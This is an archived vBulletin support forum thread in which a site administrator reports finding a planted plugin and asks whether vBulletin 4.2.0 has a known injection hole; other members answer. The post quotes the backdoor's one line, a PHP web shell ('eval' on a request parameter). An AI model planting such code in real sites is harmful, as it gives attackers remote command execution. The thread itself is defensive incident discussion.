vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=251)
-   -   Dangerous SQL injection vulnerability in 4:2:0? (https://vborg.vbsupport.ru/showthread.php?t=313396)

jfxcube 08-01-2014 02:06 PM
Dangerous SQL injection vulnerability in 4:2:0?
 
This week we found a new plugin (we are still investigating about "how") with this code:

Code:
eval($_REQUEST[cmd]);
Apparently, in apache logs and vBulletin logs there is nothing.

Do you know any known issues about this vulnerability in vBulletin 4.2.0 l2?

Seems to be similar to this one:

http://www.pcworld.com/article/24555...erability.html

Dave 08-01-2014 02:09 PM
This isn't present in vBulletin by default. It's a piece of code implemented by a hacker or someone who wants to do bad stuff.

jfxcube 08-01-2014 02:43 PM
I knew that ................. i'm just asking if there is some known vulnerability in vbulletin 4.2.0 l2 that let bad guys do some sql injection in tables like plugin, so that i can save time investigating by myself to find the exploit used to inject that code.

ForceHSS 08-01-2014 02:47 PM
We don't know what plugins you have or if you have the install folder still in your FTP so its hard to answer. The best way would be to get someone to login and fix your problem if you don't know how to do it yourself

Dave 08-01-2014 02:48 PM
As far as I know there is no public exploit for vBulletin 4.2+, a private exploit is always possible or a vulnerable plugin.

Paul M 08-01-2014 02:49 PM
Quote:
Originally Posted by jfxcube (Post 2509294)
i'm just asking if there is some known vulnerability in vbulletin 4.2.0 l2 that let bad guys do some sql injection in tables like plugin.
No, there isnt.

Zachery 08-01-2014 03:36 PM
In 4.2? If you've left the install folder around, yes. If you haven't no.

jfxcube 08-01-2014 05:19 PM
Quote:
Originally Posted by Zachery (Post 2509309)
In 4.2? If you've left the install folder around, yes. If you haven't no.
It's the first thing i 've deleted after finishing installing it


All times are GMT. The time now is 08:01 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01322 seconds
  • Memory Usage 1,725KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (2)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (8)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete